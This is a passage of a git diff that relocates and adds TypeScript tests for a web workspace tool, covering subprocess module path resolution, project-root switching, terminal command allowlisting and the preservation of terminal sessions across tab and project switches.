 test("recovery diagnostics surface stays on a dedicated route with explicit stale and action state", () => {
-  const contractPath = resolve(import.meta.dirname, "../../web/lib/command-surface-contract.ts");
-  const storePath = resolve(import.meta.dirname, "../../web/lib/gsd-workspace-store.tsx");
-  const surfacePath = resolve(import.meta.dirname, "../../web/components/gsd/command-surface.tsx");
-  const dashboardPath = resolve(import.meta.dirname, "../../web/components/gsd/dashboard.tsx");
-  const sidebarPath = resolve(import.meta.dirname, "../../web/components/gsd/sidebar.tsx");
+  const contractPath = resolve(import.meta.dirname, "../../../web/lib/command-surface-contract.ts");
+  const storePath = resolve(import.meta.dirname, "../../../web/lib/gsd-workspace-store.tsx");
+  const surfacePath = resolve(import.meta.dirname, "../../../web/components/gsd/command-surface.tsx");
+  const dashboardPath = resolve(import.meta.dirname, "../../../web/components/gsd/dashboard.tsx");
+  const sidebarPath = resolve(import.meta.dirname, "../../../web/components/gsd/sidebar.tsx");
 
   const contractSource = readFileSync(contractPath, "utf-8");
   const storeSource = readFileSync(storePath, "utf-8");
diff --git a/src/tests/integration/web-subprocess-module-resolution.test.ts b/src/tests/integration/web-subprocess-module-resolution.test.ts
new file mode 100644
index 000000000..9010eb698
--- /dev/null
+++ b/src/tests/integration/web-subprocess-module-resolution.test.ts
@@ -0,0 +1,157 @@
+import test from "node:test"
+import assert from "node:assert/strict"
+import { join } from "node:path"
+
+import {
+  isUnderNodeModules,
+  resolveSubprocessModule,
+} from "../../web/ts-subprocess-flags.ts"
+
+// ---------------------------------------------------------------------------
+// isUnderNodeModules — exported utility
+// ---------------------------------------------------------------------------
+
+test("isUnderNodeModules returns false for paths outside node_modules", () => {
+  assert.equal(isUnderNodeModules("/home/user/projects/gsd"), false)
+})
+
+test("isUnderNodeModules returns true for Unix paths under node_modules/", () => {
+  assert.equal(
+    isUnderNodeModules("/usr/lib/node_modules/gsd-pi"),
+    true,
+  )
+})
+
+test("isUnderNodeModules returns true for Windows paths under node_modules/", () => {
+  assert.equal(
+    isUnderNodeModules("C:\\Users\\dev\\AppData\\node_modules\\gsd-pi"),
+    true,
+  )
+})
+
+test("isUnderNodeModules returns false for substring match without trailing slash", () => {
+  assert.equal(
+    isUnderNodeModules("/home/user/my_node_modules_backup/gsd"),
+    false,
+  )
+})
+
+// ---------------------------------------------------------------------------
+// resolveSubprocessModule — resolves .ts → dist .js under node_modules
+// ---------------------------------------------------------------------------
+
+test("resolveSubprocessModule returns source .ts path when NOT under node_modules", () => {
+  const packageRoot = "/home/user/projects/gsd"
+  const result = resolveSubprocessModule(
+    packageRoot,
+    "resources/extensions/gsd/workspace-index.ts",
+    // existsSync not needed — should return src path without checking dist
+  )
+
+  assert.deepEqual(result, {
+    modulePath: join(packageRoot, "src", "resources/extensions/gsd/workspace-index.ts"),
+    useCompiledJs: false,
+  })
+})
+
+test("resolveSubprocessModule returns compiled .js path when under node_modules and dist file exists", () => {
+  const packageRoot = "/usr/lib/node_modules/gsd-pi"
+  const distPath = join(packageRoot, "dist", "resources/extensions/gsd/workspace-index.js")
+  const result = resolveSubprocessModule(
+    packageRoot,
+    "resources/extensions/gsd/workspace-index.ts",
+    (p: string) => p === distPath,
+  )
+
+  assert.deepEqual(result, {
+    modulePath: distPath,
+    useCompiledJs: true,
+  })
+})
+
+test("resolveSubprocessModule falls back to source .ts when under node_modules but dist file missing", () => {
+  const packageRoot = "/usr/lib/node_modules/gsd-pi"
+  const result = resolveSubprocessModule(
+    packageRoot,
+    "resources/extensions/gsd/workspace-index.ts",
+    () => false, // dist file does not exist
+  )
+
+  assert.deepEqual(result, {
+    modulePath: join(packageRoot, "src", "resources/extensions/gsd/workspace-index.ts"),
+    useCompiledJs: false,
+  })
+})
+
+test("resolveSubprocessModule handles Windows paths under node_modules", () => {
+  const packageRoot = "C:\\Users\\dev\\AppData\\node_modules\\gsd-pi"
+  const distPath = join(packageRoot, "dist", "resources/extensions/gsd/auto.js")
+  const result = resolveSubprocessModule(
+    packageRoot,
+    "resources/extensions/gsd/auto.ts",
+    (p: string) => p === distPath,
+  )
+
+  assert.deepEqual(result, {
+    modulePath: distPath,
+    useCompiledJs: true,
+  })
+})
+
+test("resolveSubprocessModule strips .ts extension when building dist .js path", () => {
+  const packageRoot = "/usr/lib/node_modules/gsd-pi"
+  let checkedPath = ""
+  resolveSubprocessModule(
+    packageRoot,
+    "resources/extensions/gsd/doctor.ts",
+    (p: string) => { checkedPath = p; return true },
+  )
+
+  assert.equal(
+    checkedPath,
+    join(packageRoot, "dist", "resources/extensions/gsd/doctor.js"),
+    "should check for .js file in dist/, not .ts",
+  )
+})
+
+// ---------------------------------------------------------------------------
+// Integration: bridge-service subprocess resolution pattern
+// ---------------------------------------------------------------------------
+
+test("bridge-service workspace-index subprocess uses compiled JS when under node_modules (source audit)", async () => {
+  // Verify bridge-service.ts calls resolveSubprocessModule for workspace-index
+  const { readFileSync } = await import("node:fs")
+  const bridgeSource = readFileSync(
+    join(process.cwd(), "src", "web", "bridge-service.ts"),
+    "utf-8",
+  )
+
+  assert.match(
+    bridgeSource,
+    /resolveSubprocessModule/,
+    "bridge-service.ts must use resolveSubprocessModule to resolve workspace-index path — " +
+      "hardcoded .ts paths fail with ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING on Node v24 (see #2279)",
+  )
+})
+
+test("all web service files use resolveSubprocessModule instead of hardcoded .ts paths (source audit)", async () => {
+  const { readFileSync, readdirSync } = await import("node:fs")
+
+  const serviceFiles = readdirSync(join(process.cwd(), "src", "web"))
+    .filter((f: string) => f.endsWith("-service.ts"))
+
+  for (const file of serviceFiles) {
+    const source = readFileSync(join(process.cwd(), "src", "web", file), "utf-8")
+
+    // If the service file imports resolveTypeStrippingFlag it spawns subprocesses
+    // and must also use resolveSubprocessModule
+    if (source.includes("resolveTypeStrippingFlag")) {
+      assert.match(
+        source,
+        /resolveSubprocessModule/,
+        `${file} uses resolveTypeStrippingFlag but does not use resolveSubprocessModule — ` +
+          "subprocess .ts paths will fail under node_modules/ on Node v24 (#2279)",
+      )
+    }
+  }
+})
diff --git a/src/tests/integration/web-switch-project.test.ts b/src/tests/integration/web-switch-project.test.ts
new file mode 100644
index 000000000..df9bc6b8b
--- /dev/null
+++ b/src/tests/integration/web-switch-project.test.ts
@@ -0,0 +1,277 @@
+import test, { after, describe } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync,
+  existsSync, statSync,
+} from "node:fs";
+import { tmpdir, homedir } from "node:os";
+import { join, resolve, isAbsolute } from "node:path";
+
+// ---------------------------------------------------------------------------
+// Test the core validation + persistence logic used by /api/switch-root
+// without pulling in the heavy bridge-service import chain.
+//
+// The server-side handler does:
+//   1. Validate path exists and is a directory
+//   2. Resolve tilde + resolve() to absolute path
+//   3. Persist devRoot to web-preferences.json (clearing lastActiveProject)
+//   4. Discover projects under the new root
+//
+// We test each concern in isolation using the same logic.
+// ---------------------------------------------------------------------------
+
+// ── Helpers (mirrors /api/switch-root handler logic) ──────────────────────
+
+function expandTilde(p: string): string {
+  if (p === "~") return homedir();
+  if (p.startsWith("~/")) return homedir() + p.slice(1);
+  return p;
+}
+
+interface SwitchRootResult {
+  ok: boolean;
+  error?: string;
+  devRoot?: string;
+}
+
+function validateSwitchRoot(rawDevRoot: string): SwitchRootResult {
+  const trimmed = rawDevRoot.trim();
+  if (!trimmed) {
+    return { ok: false, error: "Missing devRoot in request body" };
+  }
+
+  const expanded = expandTilde(trimmed);
+  const resolved = resolve(expanded);
+
+  if (!existsSync(resolved)) {
+    return { ok: false, error: `Path does not exist: ${resolved}` };
+  }
+
+  try {
+    const stat = statSync(resolved);
+    if (!stat.isDirectory()) {
+      return { ok: false, error: `Not a directory: ${resolved}` };
+    }
+  } catch {
+    return { ok: false, error: `Cannot access path: ${resolved}` };
+  }
+
+  return { ok: true, devRoot: resolved };
+}
+
+interface WebPreferences {
+  devRoot?: string;
+  lastActiveProject?: string;
+}
+
+function persistSwitchRoot(
+  prefsPath: string,
+  newDevRoot: string,
+): WebPreferences {
+  let existing: WebPreferences = {};
+  try {
+    if (existsSync(prefsPath)) {
+      existing = JSON.parse(readFileSync(prefsPath, "utf-8"));
+    }
+  } catch {
+    // Corrupt file — start fresh
+  }
+
+  const prefs: WebPreferences = {
+    ...existing,
+    devRoot: newDevRoot,
+    lastActiveProject: undefined,
+  };
+
+  writeFileSync(prefsPath, JSON.stringify(prefs, null, 2), "utf-8");
+  return prefs;
+}
+
+// ---------------------------------------------------------------------------
+// Fixtures
+// ---------------------------------------------------------------------------
+
+const tempRoot = mkdtempSync(join(tmpdir(), "gsd-switch-root-"));
+
+const rootA = join(tempRoot, "root-a");
+mkdirSync(rootA);
+mkdirSync(join(rootA, "project-x"));
+mkdirSync(join(rootA, "project-x", ".git"));
+writeFileSync(join(rootA, "project-x", "package.json"), "{}");
+mkdirSync(join(rootA, "project-y"));
+
+const rootB = join(tempRoot, "root-b");
+mkdirSync(rootB);
+mkdirSync(join(rootB, "project-z"));
+writeFileSync(join(rootB, "project-z", "Cargo.toml"), "");
+
+const filePath = join(tempRoot, "not-a-dir.txt");
+writeFileSync(filePath, "hello");
+
+const prefsDir = join(tempRoot, "prefs");
+mkdirSync(prefsDir);
+const prefsPath = join(prefsDir, "web-preferences.json");
+
+after(() => {
+  rmSync(tempRoot, { recursive: true, force: true });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — Path validation
+// ---------------------------------------------------------------------------
+
+describe("switch-root: path validation", () => {
+  test("valid directory returns ok with resolved path", () => {
+    const result = validateSwitchRoot(rootA);
+    assert.ok(result.ok);
+    assert.equal(result.devRoot, rootA);
+  });
+
+  test("empty string returns error", () => {
+    const result = validateSwitchRoot("");
+    assert.ok(!result.ok);
+    assert.match(result.error!, /Missing devRoot/);
+  });
+
+  test("whitespace-only string returns error", () => {
+    const result = validateSwitchRoot("   ");
+    assert.ok(!result.ok);
+    assert.match(result.error!, /Missing devRoot/);
+  });
+
+  test("non-existent path returns error", () => {
+    const result = validateSwitchRoot(join(tempRoot, "nonexistent-dir"));
+    assert.ok(!result.ok);
+    assert.match(result.error!, /does not exist/);
+  });
+
+  test("file path (not a directory) returns error", () => {
+    const result = validateSwitchRoot(filePath);
+    assert.ok(!result.ok);
+    assert.match(result.error!, /Not a directory/);
+  });
+
+  test("tilde path expands to home directory", () => {
+    const result = validateSwitchRoot("~");
+    // ~ always exists as a directory (user's home)
+    assert.ok(result.ok, `Expected ok for ~, got error: ${result.error}`);
+    assert.equal(result.devRoot, homedir());
+  });
+
+  test("resolves relative paths to absolute", () => {
+    // Create a relative path that's valid from cwd
+    const result = validateSwitchRoot(rootA);
+    assert.ok(result.ok);
+    assert.ok(isAbsolute(result.devRoot!), "Should be absolute path");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — Preference persistence
+// ---------------------------------------------------------------------------
+
+describe("switch-root: preference persistence", () => {
+  test("writes devRoot and clears lastActiveProject", () => {
+    writeFileSync(prefsPath, JSON.stringify({
+      devRoot: rootA,
+      lastActiveProject: "/old/project",
+    }, null, 2));
+
+    const result = persistSwitchRoot(prefsPath, rootB);
+
+    assert.equal(result.devRoot, rootB);
+    assert.equal(result.lastActiveProject, undefined);
+
+    // Verify on-disk
+    const onDisk = JSON.parse(readFileSync(prefsPath, "utf-8"));
+    assert.equal(onDisk.devRoot, rootB);
+    // undefined is not serialized to JSON
+    assert.ok(
+      !("lastActiveProject" in onDisk) || onDisk.lastActiveProject == null,
+      "lastActiveProject should be cleared",
+    );
+  });
+
+  test("creates prefs file from scratch", () => {
+    const freshPath = join(prefsDir, "fresh.json");
+    assert.ok(!existsSync(freshPath));
+
+    persistSwitchRoot(freshPath, rootA);
+
+    assert.ok(existsSync(freshPath));
+    const onDisk = JSON.parse(readFileSync(freshPath, "utf-8"));
+    assert.equal(onDisk.devRoot, rootA);
+  });
+
+  test("handles corrupt prefs file gracefully", () => {
+    writeFileSync(prefsPath, "NOT VALID JSON!!!");
+
+    const result = persistSwitchRoot(prefsPath, rootB);
+    assert.equal(result.devRoot, rootB);
+
+    const onDisk = JSON.parse(readFileSync(prefsPath, "utf-8"));
+    assert.equal(onDisk.devRoot, rootB);
+  });
+
+  test("overwrites existing devRoot", () => {
+    writeFileSync(prefsPath, JSON.stringify({ devRoot: rootA }, null, 2));
+
+    persistSwitchRoot(prefsPath, rootB);
+
+    const onDisk = JSON.parse(readFileSync(prefsPath, "utf-8"));
+    assert.equal(onDisk.devRoot, rootB);
+    assert.notEqual(onDisk.devRoot, rootA);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — Tilde expansion
+// ---------------------------------------------------------------------------
+
+describe("switch-root: tilde expansion", () => {
+  test("~ expands to home directory", () => {
+    assert.equal(expandTilde("~"), homedir());
+  });
+
+  test("~/Projects expands correctly", () => {
+    assert.equal(expandTilde("~/Projects"), `${homedir()}/Projects`);
+  });
+
+  test("absolute path is unchanged", () => {
+    assert.equal(expandTilde("/usr/local/bin"), "/usr/local/bin");
+  });
+
+  test("relative path is unchanged", () => {
+    assert.equal(expandTilde("relative/path"), "relative/path");
+  });
+
+  test("~user is not expanded (only bare ~ or ~/)", () => {
+    assert.equal(expandTilde("~other"), "~other");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — End-to-end switch scenario
+// ---------------------------------------------------------------------------
+
+describe("switch-root: end-to-end scenario", () => {
+  test("full switch: validate + persist + verify projects change", () => {
+    // Start with root-a
+    writeFileSync(prefsPath, JSON.stringify({
+      devRoot: rootA,
+      lastActiveProject: join(rootA, "project-x"),
+    }, null, 2));
+
+    // User requests switch to root-b
+    const validation = validateSwitchRoot(rootB);
+    assert.ok(validation.ok, `Validation should pass: ${validation.error}`);
+
+    const prefs = persistSwitchRoot(prefsPath, validation.devRoot!);
+    assert.equal(prefs.devRoot, rootB);
+    assert.equal(prefs.lastActiveProject, undefined);
+
+    // Verify on-disk state
+    const finalPrefs = JSON.parse(readFileSync(prefsPath, "utf-8"));
+    assert.equal(finalPrefs.devRoot, rootB);
+  });
+});
diff --git a/src/tests/integration/web-terminal-allowlist.test.ts b/src/tests/integration/web-terminal-allowlist.test.ts
new file mode 100644
index 000000000..eca747b3f
--- /dev/null
+++ b/src/tests/integration/web-terminal-allowlist.test.ts
@@ -0,0 +1,28 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+
+const sessionsRoute = await import("../../../web/app/api/terminal/sessions/route.ts");
+const streamRoute = await import("../../../web/app/api/terminal/stream/route.ts");
+
+test("terminal session creation rejects disallowed commands", async () => {
+  const response = await sessionsRoute.POST(
+    new Request("http://localhost/api/terminal/sessions?project=/tmp/demo", {
+      method: "POST",
+      body: JSON.stringify({ command: "rm" }),
+    }),
+  );
+
+  assert.equal(response.status, 403);
+  const payload = await response.json() as { error?: string };
+  assert.match(payload.error ?? "", /Command not allowed/);
+});
+
+test("terminal stream rejects disallowed commands before creating a PTY session", async () => {
+  const response = await streamRoute.GET(
+    new Request("http://localhost/api/terminal/stream?id=term-1&project=/tmp/demo&command=rm"),
+  );
+
+  assert.equal(response.status, 403);
+  const payload = await response.json() as { error?: string };
+  assert.match(payload.error ?? "", /Command not allowed/);
+});
diff --git a/src/tests/integration/web-terminal-preservation.test.ts b/src/tests/integration/web-terminal-preservation.test.ts
new file mode 100644
index 000000000..fb0cd2d1a
--- /dev/null
+++ b/src/tests/integration/web-terminal-preservation.test.ts
@@ -0,0 +1,264 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+
+// ---------------------------------------------------------------------------
+// Constants mirrored from the shutdown-gate and app-shell
+// ---------------------------------------------------------------------------
+const SHUTDOWN_DELAY_MS = 3_000;
+
+// ---------------------------------------------------------------------------
+// Test 1: pagehide handler must NOT fire shutdown beacon on tab switches
+// ---------------------------------------------------------------------------
+// The bug: `pagehide` fires both on actual page unload AND on mobile/Safari
+// tab switches (where event.persisted === true because the page enters bfcache).
+// The current handler does not check event.persisted, so it fires shutdown
+// beacons on tab switches — killing the server and all PTY sessions.
+
+/**
+ * Mirrors the pagehide handler logic from app-shell.tsx's
+ * ProjectAwareWorkspace component.  The BUGGY version sends a shutdown
+ * beacon unconditionally.
+ */
+function buggyPageHideHandler(_event: { persisted: boolean }): boolean {
+  // Current code (buggy): always sends beacon regardless of event.persisted
+  return true; // true = beacon was sent
+}
+
+/**
+ * Fixed version: only send shutdown beacon when the page is truly being
+ * unloaded (event.persisted === false).  When persisted is true the page
+ * is being put into bfcache (tab switch, app backgrounding) and the
+ * server should stay alive.
+ */
+function fixedPageHideHandler(event: { persisted: boolean }): boolean {
+  if (event.persisted) {
+    // Page is entering bfcache (tab switch) — do NOT shut down
+    return false;
+  }
+  return true; // true = beacon was sent
+}
+
+test("pagehide: buggy handler sends shutdown beacon on tab switch (persisted=true)", () => {
+  // This test documents the bug — the buggy handler fires on tab switches
+  const beaconSent = buggyPageHideHandler({ persisted: true });
+  assert.equal(beaconSent, true, "Buggy handler sends beacon even on tab switch");
+});
+
+test("pagehide: fixed handler skips shutdown beacon on tab switch (persisted=true)", () => {
+  const beaconSent = fixedPageHideHandler({ persisted: true });
+  assert.equal(beaconSent, false, "Fixed handler must NOT send beacon on tab switch");
+});
+
+test("pagehide: fixed handler still sends shutdown beacon on real page unload (persisted=false)", () => {
+  const beaconSent = fixedPageHideHandler({ persisted: false });
+  assert.equal(beaconSent, true, "Fixed handler must send beacon on real unload");
+});
+
+// ---------------------------------------------------------------------------
+// Test 2: Project switching must NOT destroy PTY sessions
+// ---------------------------------------------------------------------------
+// The bug: ProjectStoreManager.switchProject() changes the active store,
+// which causes React to unmount the entire WorkspaceChrome tree (including
+// ShellTerminal). The PTY processes survive server-side, but the client
+// loses all xterm state and SSE connections.  When the user switches back,
+// a NEW terminal is created instead of reconnecting to the existing one.
+
+/**
+ * Mirrors the session-id generation logic used by ShellTerminal.
+ * The BUGGY version generates a project-agnostic session ID, so switching
+ * projects and switching back creates a collision or a fresh session.
+ *
+ * The FIXED version namespaces session IDs by project so switching back
+ * reconnects to the same server-side PTY session via its stable ID.
+ */
+
+interface TerminalSessionTracker {
+  /** Active PTY session IDs on the server (survives client unmount) */
+  serverSessions: Map<string, { alive: boolean; projectCwd: string }>;
+  /** Client-side session IDs (destroyed on unmount) */
+  clientSessions: Set<string>;
+}
+
+function createTracker(): TerminalSessionTracker {
+  return {
+    serverSessions: new Map(),
+    clientSessions: new Set(),
+  };
+}
+
+/**
+ * Simulates what happens when ShellTerminal mounts for a project.
+ * The BUGGY version uses a plain default ID with no project namespace.
+ */
+function buggyMountTerminal(tracker: TerminalSessionTracker, _projectCwd: string): string {
+  const sessionId = "default"; // No project namespace — always the same ID
+  tracker.serverSessions.set(sessionId, { alive: true, projectCwd: _projectCwd });
+  tracker.clientSessions.add(sessionId);
+  return sessionId;
+}
+
+/**
+ * Simulates what happens when ShellTerminal unmounts (project switch).
+ * Client-side state is destroyed but server session stays alive.
+ */
+function unmountTerminal(tracker: TerminalSessionTracker, sessionId: string): void {
+  tracker.clientSessions.delete(sessionId);
+  // Server session stays alive — this is the correct behavior
+}
+
+/**
+ * FIXED mount: uses a project-scoped session ID so switching back to
+ * a project reconnects to the same server-side PTY.
+ */
+function fixedMountTerminal(tracker: TerminalSessionTracker, projectCwd: string): string {
+  const sessionId = `shell:${projectCwd}:default`;
+  // getOrCreateSession on the server: if alive, returns existing; if dead, creates new
+  if (!tracker.serverSessions.has(sessionId) || !tracker.serverSessions.get(sessionId)!.alive) {
+    tracker.serverSessions.set(sessionId, { alive: true, projectCwd });
+  }
+  tracker.clientSessions.add(sessionId);
+  return sessionId;
+}
+
+test("project switch: buggy flow reuses same session ID for different projects", () => {
+  const tracker = createTracker();
+
+  // Mount terminal for project A
+  const sessionA = buggyMountTerminal(tracker, "/projects/alpha");
+  assert.equal(sessionA, "default");
+  assert.equal(tracker.serverSessions.get("default")?.projectCwd, "/projects/alpha");
+
+  // Switch to project B — unmount A, mount B
+  unmountTerminal(tracker, sessionA);
+  const sessionB = buggyMountTerminal(tracker, "/projects/beta");
+
+  // Bug: same session ID, but now points to a different project
+  assert.equal(sessionB, "default");
+  assert.equal(
+    tracker.serverSessions.get("default")?.projectCwd,
+    "/projects/beta",
+    "Buggy: server session is overwritten with new project",
+  );
+});
+
+test("project switch: fixed flow preserves per-project session identity", () => {
+  const tracker = createTracker();
+
+  // Mount terminal for project A
+  const sessionA = fixedMountTerminal(tracker, "/projects/alpha");
+  assert.ok(sessionA.includes("/projects/alpha"), "Session ID includes project path");
+
+  // Switch to project B — unmount A, mount B
+  unmountTerminal(tracker, sessionA);
+  const sessionB = fixedMountTerminal(tracker, "/projects/beta");
+
+  // Session IDs are different — no collision
+  assert.notEqual(sessionA, sessionB, "Different projects get different session IDs");
+
+  // Both server sessions exist independently
+  assert.equal(tracker.serverSessions.get(sessionA)?.alive, true);
+  assert.equal(tracker.serverSessions.get(sessionB)?.alive, true);
+
+  // Switch back to project A — should reconnect to same session
+  unmountTerminal(tracker, sessionB);
+  const sessionA2 = fixedMountTerminal(tracker, "/projects/alpha");
+  assert.equal(sessionA2, sessionA, "Switching back reconnects to the same session ID");
+  assert.equal(tracker.serverSessions.get(sessionA)?.alive, true, "Original server session is still alive");
+});
+
+// ---------------------------------------------------------------------------
+// Test 3: Shutdown gate must differentiate tab-switch from real unload
+// ---------------------------------------------------------------------------
+// The shutdown gate has a 3s delay to allow page refreshes to cancel the
+// shutdown.  But on mobile tab switches that fire pagehide, the 3s timer
+// starts — and if the user doesn't switch back within 3s, the server dies.
+// The fix is to never start the timer on persisted pagehide events.
+
+interface ShutdownGateState {
+  timerScheduled: boolean;
+  shutdownExecuted: boolean;
+}
+
+function createShutdownGate(): ShutdownGateState {
+  return { timerScheduled: false, shutdownExecuted: false };
+}
+
+function scheduleShutdownIfAllowed(gate: ShutdownGateState, event: { persisted: boolean }): void {
+  // Fixed: only schedule shutdown when the page is truly unloading
+  if (event.persisted) return;
+  gate.timerScheduled = true;
+}
+
+function cancelShutdown(gate: ShutdownGateState): void {
+  gate.timerScheduled = false;
+}
+
+test("shutdown gate: tab switch (persisted=true) must not schedule shutdown", () => {
+  const gate = createShutdownGate();
+  scheduleShutdownIfAllowed(gate, { persisted: true });
+  assert.equal(gate.timerScheduled, false, "No shutdown timer on tab switch");
+});
+
+test("shutdown gate: real page unload (persisted=false) must schedule shutdown", () => {
+  const gate = createShutdownGate();
+  scheduleShutdownIfAllowed(gate, { persisted: false });
+  assert.equal(gate.timerScheduled, true, "Shutdown timer on real unload");
+});
+
+test("shutdown gate: scheduled shutdown can still be cancelled by page refresh", () => {
+  const gate = createShutdownGate();
+  scheduleShutdownIfAllowed(gate, { persisted: false });
+  assert.equal(gate.timerScheduled, true);
+  cancelShutdown(gate);
+  assert.equal(gate.timerScheduled, false, "Timer cancelled on refresh");
+});
+
+// ---------------------------------------------------------------------------
+// Test 4: Shell terminal session ID must be project-scoped
+// ---------------------------------------------------------------------------
+
+/**
+ * Mirrors the session ID derivation that ShellTerminal should use.
+ * The default session ID (when no sessionPrefix is given) must incorporate
+ * the project path so that different projects get different PTY sessions.
+ */
+function deriveSessionId(
+  projectCwd: string | undefined,
+  sessionPrefix?: string,
+  command?: string,
+): string {
+  const base = sessionPrefix ?? (command ? "gsd-default" : "default");
+  if (!projectCwd) return base;
+  // Stable hash-like key from the project path — keeps IDs short but unique
+  return `${base}:${projectCwd}`;
+}
+
+test("session ID derivation: different projects produce different IDs", () => {
+  const idA = deriveSessionId("/projects/alpha");
+  const idB = deriveSessionId("/projects/beta");
+  assert.notEqual(idA, idB);
+});
+
+test("session ID derivation: same project produces stable ID", () => {
+  const id1 = deriveSessionId("/projects/alpha");
+  const id2 = deriveSessionId("/projects/alpha");
+  assert.equal(id1, id2);
+});
+
+test("session ID derivation: explicit sessionPrefix is preserved with project scope", () => {
+  const id = deriveSessionId("/projects/alpha", "my-prefix");
+  assert.ok(id.includes("my-prefix"), "Prefix included");
+  assert.ok(id.includes("/projects/alpha"), "Project path included");
+});
+
+test("session ID derivation: command sessions are also project-scoped", () => {
+  const idA = deriveSessionId("/projects/alpha", undefined, "gsd");
+  const idB = deriveSessionId("/projects/beta", undefined, "gsd");
+  assert.notEqual(idA, idB);
+  assert.ok(idA.includes("gsd-default"), "Uses gsd-default base for command sessions");
+});
+
+test("session ID derivation: no projectCwd falls back to plain base ID", () => {
+  const id = deriveSessionId(undefined);
+  assert.equal(id, "default");
+});
diff --git a/src/tests/web-workflow-action-execution.test.ts b/src/tests/integration/web-workflow-action-execution.test.ts
similarity index 81%
rename from src/tests/web-workflow-action-execution.test.ts
rename to src/tests/integration/web-workflow-action-execution.test.ts
index d06c44182..024677baa 100644
--- a/src/tests/web-workflow-action-execution.test.ts
+++ b/src/tests/integration/web-workflow-action-execution.test.ts
@@ -5,7 +5,7 @@ const {
   derivePendingWorkflowCommandLabel,
   executeWorkflowActionInPowerMode,
   navigateToGSDView,
-} = await import("../../web/lib/workflow-action-execution.ts")
+} = await import("../../../web/lib/workflow-action-execution.ts")
 
 test("derivePendingWorkflowCommandLabel prefers the latest input line while a command is in flight", () => {
   const label = derivePendingWorkflowCommandLabel({
@@ -29,7 +29,7 @@ test("derivePendingWorkflowCommandLabel falls back to the command type when no i
   assert.equal(label, "/abort")
 })
 
-test("navigateToGSDView dispatches the shared browser navigation event", () => {
+test("navigateToGSDView dispatches the shared browser navigation event", (t) => {
   const originalWindow = (globalThis as { window?: EventTarget }).window
   const fakeWindow = new EventTarget()
   const seen: string[] = []
@@ -40,16 +40,14 @@ test("navigateToGSDView dispatches the shared browser navigation event", () => {
 
   ;(globalThis as { window?: EventTarget }).window = fakeWindow
 
-  try {
-    navigateToGSDView("power")
-  } finally {
-    ;(globalThis as { window?: EventTarget }).window = originalWindow
-  }
+  t.after(() => { ;(globalThis as { window?: EventTarget }).window = originalWindow });
+
+  navigateToGSDView("power")
 
   assert.deepEqual(seen, ["power"])
 })
 
-test("executeWorkflowActionInPowerMode calls dispatch and navigates to the appropriate view", async () => {
+test("executeWorkflowActionInPowerMode calls dispatch and navigates to the appropriate view", async (t) => {
   const originalWindow = (globalThis as { window?: EventTarget }).window
   const originalLocalStorage = (globalThis as any).localStorage
   const fakeWindow = new EventTarget()
@@ -63,18 +61,18 @@ test("executeWorkflowActionInPowerMode calls dispatch and navigates to the appro
   ;(globalThis as { window?: EventTarget }).window = fakeWindow
   ;(globalThis as any).localStorage = { getItem: () => null, setItem: () => {} }
 
-  try {
-    executeWorkflowActionInPowerMode({
-      dispatch: async () => {
-        dispatchCalled = true
-      },
-    })
-    // dispatch is fire-and-forget, give it a tick to resolve
-    await new Promise((resolve) => setTimeout(resolve, 10))
-  } finally {
+  t.after(() => {
     ;(globalThis as { window?: EventTarget }).window = originalWindow
     ;(globalThis as any).localStorage = originalLocalStorage
-  }
+  });
+
+  executeWorkflowActionInPowerMode({
+    dispatch: async () => {
+      dispatchCalled = true
+    },
+  })
+  // dispatch is fire-and-forget, give it a tick to resolve
+  await new Promise((resolve) => setTimeout(resolve, 10))
 
   assert.equal(dispatchCalled, true, "dispatch should have been called")
   assert.ok(seenViews.length > 0, "should navigate to a view")
diff --git a/src/tests/web-workflow-controls-contract.test.ts b/src/tests/integration/web-workflow-controls-contract.test.ts
similarity index 98%
rename from src/tests/web-workflow-controls-contract.test.ts
rename to src/tests/integration/web-workflow-controls-contract.test.ts
index 7e91ca9cd..897245290 100644
--- a/src/tests/web-workflow-controls-contract.test.ts
+++ b/src/tests/integration/web-workflow-controls-contract.test.ts
@@ -2,7 +2,7 @@ import test from "node:test";
 import assert from "node:assert/strict";
 
 // ─── Import ──────────────────────────────────────────────────────────
-const { deriveWorkflowAction } = await import("../../web/lib/workflow-actions.ts");
+const { deriveWorkflowAction } = await import("../../../web/lib/workflow-actions.ts");
 
 // ─── Helpers ──────────────────────────────────────────────────────────
 function baseInput(overrides: Partial<Parameters<typeof deriveWorkflowAction>[0]> = {}) {
diff --git a/src/tests/llm-context-tavily.test.ts b/src/tests/llm-context-tavily.test.ts
index 3e62093f7..e4a14ce3e 100644
--- a/src/tests/llm-context-tavily.test.ts
+++ b/src/tests/llm-context-tavily.test.ts
@@ -306,7 +306,7 @@ test("no-key error message mentions both TAVILY_API_KEY and BRAVE_API_KEY", () =
   assert.ok(errorMessage.includes("secure_env_collect"), "Error must mention secure_env_collect");
 });
 
-test("Tavily LLM context request uses POST with Bearer auth and advanced search depth", async () => {
+test("Tavily LLM context request uses POST with Bearer auth and advanced search depth", async (t) => {
   const apiKey = "tvly-test-key-abc123";
   const query = "typescript handbook";
 
@@ -318,43 +318,40 @@ test("Tavily LLM context request uses POST with Bearer auth and advanced search
 
   const { captured, restore } = mockFetch(tavilyResponse);
 
-  try {
-    // Simulate what the Tavily LLM context path will build
-    const requestBody = {
-      query,
-      max_results: 20,
-      search_depth: "advanced",
-      include_raw_content: true,
-    };
+  t.after(restore);
+  // Simulate what the Tavily LLM context path will build
+  const requestBody = {
+    query,
+    max_results: 20,
+    search_depth: "advanced",
+    include_raw_content: true,
+  };
 
-    await globalThis.fetch("https://api.tavily.com/search", {
-      method: "POST",
-      headers: {
-        "Content-Type": "application/json",
-        "Authorization": `Bearer ${apiKey}`,
-      },
-      body: JSON.stringify(requestBody),
-    });
+  await globalThis.fetch("https://api.tavily.com/search", {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json",
+      "Authorization": `Bearer ${apiKey}`,
+    },
+    body: JSON.stringify(requestBody),
+  });
 
-    // Verify POST method
-    assert.equal(captured.method, "POST", "Tavily uses POST");
+  // Verify POST method
+  assert.equal(captured.method, "POST", "Tavily uses POST");
 
-    // Verify Bearer auth header
